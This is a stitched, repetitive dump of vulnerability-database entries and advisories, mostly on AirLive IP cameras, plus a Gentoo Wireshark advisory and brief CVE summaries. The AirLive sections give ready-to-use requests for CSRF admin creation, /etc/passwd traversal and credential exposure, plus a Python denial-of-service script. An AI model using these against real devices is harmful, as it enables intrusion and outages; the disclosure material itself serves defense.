http://xx.xx.xx.xx/[a*3000] _____________________________________________________________________________ You will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next message, Can't Connect It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera won\x92t recuperate ever itself The following Python script could be used to test the DoS: _____________________________________________________________________________ @ request = 'GET /' + \x91A\x92 * 3000 + '.html HTTP/1.0\r\n' @ s = socket.socket() @ s.connect((cam_ip, 80)) @ s.send(request) @ response = s.recv(1024) @ s.close() _____________________________________________________________________________ 5.Credits -CVE-2013-3541 was discovered by Eliezer Varad\xe9 Lopez, Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo. -CVE-2013-3691 was discovered by Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo -CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jon\xe1s Ropero Castillo. 6.Report Timeline -2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received. -2013-06-03: Students asks for a reply. -2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities

Cross-site request forgery (CSRF) vulnerability in cgi-bin/admin/usrgrp.cgi in AirLive POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD, and possibly other camera models allows remote attackers to hijack the authentication of administrators for requests that add users. Airlive IP Camera is an IP camera device. Allows an attacker to build a malicious URI, entice the logged in user to resolve, and can log in to the user context to perform malicious operations. Such as adding an account. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. =========================================================================== AIRLIVE ==================================================================== =========================================================================== 1.Advisory Information Title: Airlive Multiple Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description Multiple vulnerabilities have been found in this devices: -CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103) -CVE-2013-3541. Relative Path Traversal(CWE-23). -CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Priveleges and Access Controls(CWE-264) -CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312) -CVE-2013-3691. Denial of Service 3.Affected Products CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD. It\x92s possible others models are affected but they were not checked. 4.PoC 4.1.Cross Site Request Forgery (CSRF) CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. In the following example we will make a vector to create an alternative user with administration credentials. _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect= _____________________________________________________________________________ 4.2.Relative Path Traversal CVE-2013-3541, Transversal Path that\x92s allow you to read file system configuration. _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd _____________________________________________________________________________ 4.3.Sensitive Information Exposure + Privilege Escalation CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID _____________________________________________________________________________ We can decode Admin password (base64). Now we can relogin like admin user and we have made the escalation privilege 4.4.Clear Text Storage of Sensitive Information CVE-2013-3687 You can find all the sensitive information about the device in plain text inside the backup file. You can open with any text editor and look for user's information for example, passwords, users and so on. 4.5.Denial of Service (DoS) Use CVE-2013-3691, DoS by overbuffing path \x91/\x92. A request with a large number of \x91a\x92 can take down the http service from the camera device. _____________________________________________________________________________ Request: http://xx.xx.xx.xx/[a*3000] _____________________________________________________________________________ You will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next message, Can't Connect It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera won\x92t recuperate ever itself The following Python script could be used to test the DoS: _____________________________________________________________________________ @ request = 'GET /' + \x91A\x92 * 3000 + '.html HTTP/1.0\r\n' @ s = socket.socket() @ s.connect((cam_ip, 80)) @ s.send(request) @ response = s.recv(1024) @ s.close() _____________________________________________________________________________ 5.Credits -CVE-2013-3541 was discovered by Eliezer Varad\xe9 Lopez, Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo. -CVE-2013-3691 was discovered by Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo -CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jon\xe1s Ropero Castillo. 6.Report Timeline -2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received. -2013-06-03: Students asks for a reply. -2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201308-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Wireshark: Multiple vulnerabilities Date: August 28, 2013 Bugs: #398549, #427964, #431572, #433990, #470262, #472762, #478694 ID: 201308-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Wireshark, allowing remote attackers to execute arbitrary code or cause Denial of Service. Background ========== Wireshark is a versatile network protocol analyzer. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-analyzer/wireshark < 1.10.1 >= 1.10.1 *>= 1.8.9 Description =========== Multiple vulnerabilities have been discovered in Wireshark. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. Workaround ========== There is no known workaround at this time. Resolution ========== All Wireshark 1.10 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.10.1" All Wireshark 1.8 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.8.9" References ========== [ 1 ] CVE-2012-0041 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0041 [ 2 ] CVE-2012-0042 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0042 [ 3 ] CVE-2012-0043 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0043 [ 4 ] CVE-2012-0066 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0066 [ 5 ] CVE-2012-0067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0067 [ 6 ] CVE-2012-0068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0068 [ 7 ] CVE-2012-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3548 [ 8 ] CVE-2012-4048 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4048 [ 9 ] CVE-2012-4049 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4049 [ 10 ] CVE-2012-4285 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4285 [ 11 ] CVE-2012-4286 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4286 [ 12 ] CVE-2012-4287 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4287 [ 13 ] CVE-2012-4288 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4288 [ 14 ] CVE-2012-4289 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4289 [ 15 ] CVE-2012-4290 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4290 [ 16 ] CVE-2012-4291 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4291 [ 17 ] CVE-2012-4292 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4292 [ 18 ] CVE-2012-4293 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4293 [ 19 ] CVE-2012-4294 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4294 [ 20 ] CVE-2012-4295 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4295 [ 21 ] CVE-2012-4296 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4296 [ 22 ] CVE-2012-4297 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4297 [ 23 ] CVE-2012-4298 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4298 [ 24 ] CVE-2013-3540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3540 [ 25 ] CVE-2013-3541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3541 [ 26 ] CVE-2013-3542 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3542 [ 27 ] CVE-2013-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3555 [ 28 ] CVE-2013-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3556 [ 29 ] CVE-2013-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3557 [ 30 ] CVE-2013-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3558 [ 31 ] CVE-2013-3559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3559 [ 32 ] CVE-2013-4074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4074 [ 33 ] CVE-2013-4075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4075 [ 34 ] CVE-2013-4076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4076 [ 35 ] CVE-2013-4077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4077 [ 36 ] CVE-2013-4078 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4078 [ 37 ] CVE-2013-4079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4079 [ 38 ] CVE-2013-4080 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4080 [ 39 ] CVE-2013-4081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4081 [ 40 ] CVE-2013-4082 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4082 [ 41 ] CVE-2013-4083 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4083 [ 42 ] CVE-2013-4920 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4920 [ 43 ] CVE-2013-4921 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4921 [ 44 ] CVE-2013-4922 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4922 [ 45 ] CVE-2013-4923 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4923 [ 46 ] CVE-2013-4924 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4924 [ 47 ] CVE-2013-4925 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4925 [ 48 ] CVE-2013-4926 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4926 [ 49 ] CVE-2013-4927 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4927 [ 50 ] CVE-2013-4928 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4928 [ 51 ] CVE-2013-4929 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4929 [ 52 ] CVE-2013-4930 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4930 [ 53 ] CVE-2013-4931 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4931 [ 54 ] CVE-2013-4932 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4932 [ 55 ] CVE-2013-4933 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4933 [ 56 ] CVE-2013-4934 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4934 [ 57 ] CVE-2013-4935 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4935 [ 58 ] CVE-2013-4936 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4936 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201308-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Directory traversal vulnerability in cgi-bin/admin/fileread in AirLive WL2600CAM and possibly other camera models allows remote attackers to read arbitrary files via a .. (dot dot) in the READ.filePath parameter. AirLive WL-2600CAM And other models cgi-bin/admin/fileread Contains a directory traversal vulnerability.By a third party .. Airlive IP Camera is an IP camera device. AirLive WL-2600CAM is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. A remote attacker can exploit this issue to obtain sensitive information that could aid in further attacks. =========================================================================== AIRLIVE ==================================================================== =========================================================================== 1.Advisory Information Title: Airlive Multiple Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description Multiple vulnerabilities have been found in this devices: -CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103) -CVE-2013-3541. Relative Path Traversal(CWE-23). -CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Priveleges and Access Controls(CWE-264) -CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312) -CVE-2013-3691. Denial of Service 3.Affected Products CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD. It\x92s possible others models are affected but they were not checked. 4.PoC 4.1.Cross Site Request Forgery (CSRF) CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator. These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. In the following example we will make a vector to create an alternative user with administration credentials. _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect= _____________________________________________________________________________ 4.2.Relative Path Traversal CVE-2013-3541, Transversal Path that\x92s allow you to read file system configuration. _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd _____________________________________________________________________________ 4.3.Sensitive Information Exposure + Privilege Escalation CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID _____________________________________________________________________________ We can decode Admin password (base64). Now we can relogin like admin user and we have made the escalation privilege 4.4.Clear Text Storage of Sensitive Information CVE-2013-3687 You can find all the sensitive information about the device in plain text inside the backup file. You can open with any text editor and look for user's information for example, passwords, users and so on. 4.5.Denial of Service (DoS) Use CVE-2013-3691, DoS by overbuffing path \x91/\x92. A request with a large number of \x91a\x92 can take down the http service from the camera device. _____________________________________________________________________________ Request: http://xx.xx.xx.xx/[a*3000] _____________________________________________________________________________ You will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next message, Can't Connect It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera won\x92t recuperate ever itself The following Python script could be used to test the DoS: _____________________________________________________________________________ @ request = 'GET /' + \x91A\x92 * 3000 + '.html HTTP/1.0\r\n' @ s = socket.socket() @ s.connect((cam_ip, 80)) @ s.send(request) @ response = s.recv(1024) @ s.close() _____________________________________________________________________________ 5.Credits -CVE-2013-3541 was discovered by Eliezer Varad\xe9 Lopez, Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo. -CVE-2013-3691 was discovered by Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo -CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jon\xe1s Ropero Castillo. 6.Report Timeline -2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received. -2013-06-03: Students asks for a reply. -2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201308-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Wireshark: Multiple vulnerabilities Date: August 28, 2013 Bugs: #398549, #427964, #431572, #433990, #470262, #472762, #478694 ID: 201308-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Wireshark, allowing remote attackers to execute arbitrary code or cause Denial of Service. Background ========== Wireshark is a versatile network protocol analyzer. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-analyzer/wireshark < 1.10.1 >= 1.10.1 *>= 1.8.9 Description =========== Multiple vulnerabilities have been discovered in Wireshark. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. Workaround ========== There is no known workaround at this time. Resolution ========== All Wireshark 1.10 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.10.1" All Wireshark 1.8 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.8.9" References ========== [ 1 ] CVE-2012-0041 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0041 [ 2 ] CVE-2012-0042 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0042 [ 3 ] CVE-2012-0043 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0043 [ 4 ] CVE-2012-0066 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0066 [ 5 ] CVE-2012-0067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0067 [ 6 ] CVE-2012-0068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0068 [ 7 ] CVE-2012-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3548 [ 8 ] CVE-2012-4048 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4048 [ 9 ] CVE-2012-4049 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4049 [ 10 ] CVE-2012-4285 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4285 [ 11 ] CVE-2012-4286 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4286 [ 12 ] CVE-2012-4287 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4287 [ 13 ] CVE-2012-4288 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4288 [ 14 ] CVE-2012-4289 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4289 [ 15 ] CVE-2012-4290 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4290 [ 16 ] CVE-2012-4291 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4291 [ 17 ] CVE-2012-4292 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4292 [ 18 ] CVE-2012-4293 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4293 [ 19 ] CVE-2012-4294 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4294 [ 20 ] CVE-2012-4295 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4295 [ 21 ] CVE-2012-4296 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4296 [ 22 ] CVE-2012-4297 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4297 [ 23 ] CVE-2012-4298 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4298 [ 24 ] CVE-2013-3540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3540 [ 25 ] CVE-2013-3541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3541 [ 26 ] CVE-2013-3542 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3542 [ 27 ] CVE-2013-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3555 [ 28 ] CVE-2013-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3556 [ 29 ] CVE-2013-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3557 [ 30 ] CVE-2013-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3558 [ 31 ] CVE-2013-3559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3559 [ 32 ] CVE-2013-4074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4074 [ 33 ] CVE-2013-4075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4075 [ 34 ] CVE-2013-4076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4076 [ 35 ] CVE-2013-4077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4077 [ 36 ] CVE-2013-4078 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4078 [ 37 ] CVE-2013-4079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4079 [ 38 ] CVE-2013-4080 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4080 [ 39 ] CVE-2013-4081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4081 [ 40 ] CVE-2013-4082 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4082 [ 41 ] CVE-2013-4083 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4083 [ 42 ] CVE-2013-4920 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4920 [ 43 ] CVE-2013-4921 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4921 [ 44 ] CVE-2013-4922 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4922 [ 45 ] CVE-2013-4923 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4923 [ 46 ] CVE-2013-4924 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4924 [ 47 ] CVE-2013-4925 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4925 [ 48 ] CVE-2013-4926 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4926 [ 49 ] CVE-2013-4927 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4927 [ 50 ] CVE-2013-4928 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4928 [ 51 ] CVE-2013-4929 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4929 [ 52 ] CVE-2013-4930 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4930 [ 53 ] CVE-2013-4931 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4931 [ 54 ] CVE-2013-4932 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4932 [ 55 ] CVE-2013-4933 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4933 [ 56 ] CVE-2013-4934 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4934 [ 57 ] CVE-2013-4935 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4935 [ 58 ] CVE-2013-4936 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4936 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201308-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Juniper Junos Pulse Secure Access Service (aka SSL VPN) with IVE OS 7.0r2 through 7.0r8 and 7.1r1 through 7.1r5 and Junos Pulse Access Control Service (aka UAC) with UAC OS 4.1r1 through 4.1r5 include a test Certification Authority (CA) certificate in the Trusted Server CAs list, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging control over that test CA. Juniper Networks Junos Pulse Secure Access Service and Pulse Access Control Service are prone to a security vulnerability that allows attackers to perform man-in-the-middle attacks. Remote attackers can exploit this issue to gain access to sensitive information; other attacks are also possible

Multiple absolute path traversal vulnerabilities in National Instruments cwui.ocx, as used in National Instruments LabWindows/CVI 2012 SP1 and earlier, National Instruments LabVIEW 2012 SP1 and earlier, the Data Analysis component in ABB DataManager 1 through 6.3.6, and other products allow remote attackers to create and execute arbitrary files via a full pathname in an argument to the ExportStyle method in the (1) CWNumEdit, (2) CWGraph, (3) CWBoolean, (4) CWSlide, or (5) CWKnob ActiveX control, in conjunction with file content in the (a) Caption or (b) FormatString property value. (1) CWNumEdit (2) CWGraph (3) CWBoolean (4) CWSlide (5) CWKnob. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ABB DataManager Data Analysis. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within multiple 3rd party CWUI activex controls. CWNumEdit, CWGraph, CWBoolean, CWSlide, and CWKnob all support an ExportStyle() method that allows creation of an arbitrary file with the desired extension and inside an arbitrary location. File content can be controlled by setting a 'Caption' or 'FormatString' property. This vulnerability can be leveraged by an attacker to execute code under the context of the current process. National Instruments is a company dedicated to test measurement, automation and embedded applications. National Instruments' multiple ActiveX control CWUI has security vulnerabilities that allow an attacker to build malicious web pages, entice users to parse, and execute arbitrary code in the application context. National Instruments' multiple ActiveX Controls are prone to a remote code-execution vulnerability caused by an insecure method. An attacker can exploit this issue by enticing an unsuspecting user to view a malicious webpage. National Instruments LabWindows/CVI and LabVIEW are products of National Instruments (National Instruments). LabWindows/CVI is a software development platform with ANSI C as the core; LabVIEW is a system design platform. ABB DataManager is a set of data analysis software developed by Swiss ABB company

Buffer overflow in the ubnt-streamer RTSP service on the Ubiquiti UBNT AirCam with airVision firmware before 1.1.6 allows remote attackers to execute arbitrary code via a long rtsp: URI in a DESCRIBE request. Ubiquiti airCam is an IP network camera device. Multiple Ubiquiti airCam Products are prone to a buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected device. Failed exploit attempts will result in a denial-of-service condition. airCam, airCam Mini, and airCam Dome running firmware 1.1.5 are vulnerable. *Advisory Information* Title: Buffer overflow in Ubiquiti airCam RTSP service Advisory ID: CORE-2013-0430 Advisory URL: http://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service Date published: 2013-06-11 Date of last update: 2013-06-11 Vendors contacted: Ubiquiti Release mode: Coordinated release 2. *Vulnerability Information* Class: Classic buffer overflow [CWE-120] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1606 3. 4. *Vulnerable Packages* . Firmware Version Verified: AirCam v1.1.5. Other devices are..

The default configuration of Parallels Plesk Panel 9.0.x and 9.2.x on UNIX, and Small Business Panel 10.x on UNIX, has an improper ScriptAlias directive for phppath, which makes it easier for remote attackers to execute arbitrary code via a crafted request, a different vulnerability than CVE-2012-1823. Parallels Plesk Panel Contains a vulnerability that allows arbitrary code execution. Parallels Plesk Panel On the web server where phppath With aliasing issues for CVE-2012-1823 Arbitrary code may be executed if the same problems exist simultaneously. In addition, CERT/CC According to the report, attacks using this problem are being carried out.Arbitrary code could be executed by a remote third party